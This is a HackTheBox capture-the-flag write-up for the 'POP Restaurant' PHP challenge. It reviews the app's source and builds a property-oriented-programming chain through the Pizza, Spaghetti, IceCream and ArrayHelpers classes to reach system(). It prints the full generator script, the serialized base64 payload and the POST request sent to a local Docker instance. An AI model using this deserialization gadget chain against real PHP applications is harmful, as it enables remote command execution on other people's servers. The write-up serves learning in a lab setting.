POP Restaurant

`Spent a week to create this food ordering system. Hope that it will not have any critical vulnerability in my application.` A WEB Challenge from HackTheBox

A challenge involving a source code review and PHP- web page injetion

Content:

• Recon

• Source Code Review

• PHP - Coding

• Injection

How I kinda - solved it:

Thanks to this little help from https://medium.com/@abdallahomaratya0/pop-restaurant-challenge-htb-b10989577596

Using the source code review I first created a docker instance to check the reactions and requests.

I noticed on this code:

<form action="order.php" method="POST">
              <input type="hidden" name="data" value="<?php echo base64_encode(serialize(new Pizza())); ?>">
              <button type="submit" class="order__button">
                <img src="Static/Images/Pizza.gif" alt="Pizza">

That there is a post mechanism - however when you look at the page there aren't really any user input except a few images that you click. I was a bit silly until i realize that every time i click there were a few requests.

Docker Instance of the WebApp

So where am I getting with this? Looking at my docker server, I got some info that this application do POST req. Moving forward.

The next step I did was to look for these objects and see what their code - sort of do, I found that they pretty much use magic methods. Check here for more info about them

https://www.php.net/manual/en/language.oop5.magic.php

three classes ArrayClassHelper Pizza, Spaghetti,IceCream

ArrayHelpers class.

class ArrayHelpers extends ArrayIterator
{
    public $callback;

    public function current()
    {
        $value = parent::current();
        $debug = call_user_func($this->callback, $value);
        return $value;
    }
}

Pizza:

class Pizza
{
    public $price;
    public $cheese;
    public $size;

    public function __destruct()
    {
        echo $this->size->what;
    }
}

Spaghetti:

class Spaghetti
{
    public $sauce;
    public $noodles;
    public $portion;

   public function __get($tomato)
    {

        ($this->sauce)();
    }

}

IceCream

class IceCream
{
    public $flavors;
    public $topping;

    public function __invoke()
    {

        foreach ($this->flavors as $flavor) {
           echo $flavor;

        }
    }
}

so I have three diffrent classes and each class has a function.

I was kinda stuck so i looked at @Abdulla Omar Atya work and found that YES you need to recreate a new code to chain the three classes to execute! Sooo i sorta copied his code and meshed it all in one and helped me with it since I am not a PHP kind of guy and by reading through the PHP pages kinda did helped but not really!

His idea of using the ArrayIterator is fantastic!

Goal make chain to this diffrent classes to exec system or any function.

The winning code

<?php

namespace Helpers {
    use ArrayIterator;

    class ArrayHelpers extends ArrayIterator
    {
        public $callback;

        public function current()
        {
            $value = parent::current();
            call_user_func($this->callback, $value);
            return $value;
        }
    }
}

namespace {
    class IceCream
    {
        public $flavors;
        public $topping;
    }

    class Spaghetti
    {
        public $sauce;
        public $noodles;
        public $portion;
    }

    class Pizza
    {
        public $price;
        public $cheese;
        public $size;
    }

    // Create the objects and set their properties
    $ArrayHelpers = new \\Helpers\\ArrayHelpers(['cat /pBhfMBQlu9uT_flag.txt']); // Explicitly reference the namespace
    $ArrayHelpers->callback = 'system';

    $IceCream = new IceCream();
    $IceCream->flavors = $ArrayHelpers;

    $Spaghetti = new Spaghetti();
    $Spaghetti->sauce = $IceCream;

    $Pizza = new Pizza();
    $Pizza->size = $Spaghetti;

    // Serialize the object
    $serialized = serialize($Pizza);

    // Encode it for transmission
    $encoded = base64_encode($serialized);

    echo "Serialized and encoded payload:\\n";
    echo $encoded . "\\n";
}

Payload Creation

The Request

POST /order.php HTTP/1.1

Host: 0.0.0.0:8080

Content-Length: 411

Cache-Control: max-age=0

Accept-Language: en-US,en;q=0.9

Origin: http://0.0.0.0:8080

Content-Type: application/x-www-form-urlencoded

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Referer: http://0.0.0.0:8080/index.php

Accept-Encoding: gzip, deflate, br

Cookie: PHPSESSID=
Connection: keep-alive



data=Tzo1OiJQaXp6YSI6Mzp7czo1OiJwcmljZSI7TjtzOjY6ImNoZWVzZSI7TjtzOjQ6InNpemUiO086OToiU3BhZ2hldHRpIjozOntzOjU6InNhdWNlIjtPOjg6IkljZUNyZWFtIjoyOntzOjc6ImZsYXZvcnMiO086MjA6IkhlbHBlcnNcQXJyYXlIZWxwZXJzIjo0OntpOjA7aTowO2k6MTthOjE6e2k6MDtzOjI2OiJjYXQgL1gxYktBaU05Z1F4T19mbGFnLnR4dCI7fWk6MjthOjE6e3M6ODoiY2FsbGJhY2siO3M6Njoic3lzdGVtIjt9aTozO047fXM6NzoidG9wcGluZyI7Tjt9czo3OiJub29kbGVzIjtOO3M6NzoicG9ydGlvbiI7Tjt9fQ==

From the docker instance